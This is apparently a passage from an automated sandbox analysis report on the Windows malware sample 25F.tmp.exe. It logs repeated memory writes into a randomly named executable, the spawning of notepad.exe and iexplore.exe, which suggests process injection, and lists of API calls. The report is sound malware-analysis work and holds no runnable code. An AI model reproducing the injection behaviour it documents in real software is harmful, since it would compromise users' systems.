            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1D0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 260000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 5D0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1C0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 230000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 190000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 250000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2A0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 270000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2B0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2D0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 150000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 750000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 120000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1C0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 550000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 250000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2E0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 390000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1B0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 820000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3E0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 280000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 5F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2B0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 8A0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1D0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1C0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 8E0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 410000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 140000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3A0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 160000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 140000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 190000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exe | Process created: C:\Users\user\Desktop\25F.tmp.exe C:\Users\user\Desktop\25F.tmp.exe
            Source: C:\Users\user\Desktop\25F.tmp.exe | Process created: C:\Windows\notepad.exe "C:\Windows\notepad.exe"
            Source: C:\Users\user\Desktop\25F.tmp.exe | Process created: C:\Users\user\Desktop\25F.tmp.exe C:\Users\user\Desktop\25F.tmp.exe
            Source: C:\Users\user\Desktop\25F.tmp.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
            Source: QgGhoOpxHPl.exe, 00000009.00000000.384034855.0000000001260000.00000002.00000001.00040000.00000000.sdmp, QgGhoOpxHPl.exe, 00000009.00000002.624311663.0000000001260000.00000002.00000001.00040000.00000000.sdmp, QgGhoOpxHPl.exe, 0000000A.00000002.624230565.0000000001260000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
            Source: QgGhoOpxHPl.exe, 00000009.00000000.384034855.0000000001260000.00000002.00000001.00040000.00000000.sdmp, QgGhoOpxHPl.exe, 00000009.00000002.624311663.0000000001260000.00000002.00000001.00040000.00000000.sdmp, QgGhoOpxHPl.exe, 0000000A.00000002.624230565.0000000001260000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: QgGhoOpxHPl.exe, 00000009.00000000.384034855.0000000001260000.00000002.00000001.00040000.00000000.sdmp, QgGhoOpxHPl.exe, 00000009.00000002.624311663.0000000001260000.00000002.00000001.00040000.00000000.sdmp, QgGhoOpxHPl.exe, 0000000A.00000002.624230565.0000000001260000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: !Progman
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_006047B8
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_006048C3
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: GetLocaleInfoA,GetACP,0_2_00607C80
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: GetLocaleInfoA,0_2_00606ADC
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: GetLocaleInfoA,0_2_00606B28
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: GetLocaleInfoA,0_2_00604BC8
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,2_2_006048C3
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: GetLocaleInfoA,GetACP,2_2_00607C80
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: GetLocaleInfoA,2_2_00606ADC
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: GetLocaleInfoA,2_2_00606B28
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: GetLocaleInfoA,2_2_00604BC8
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,2_2_006047B8
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,4_2_0036B480
            Source: C:\Users\user\Desktop\25F.tmp.exe | Code function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,4_2_0040B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,9_2_003DB480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,10_2_0018B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,11_2_0038B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,12_2_0041B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,13_2_001BB480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe | Code function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,14_2_0035B480
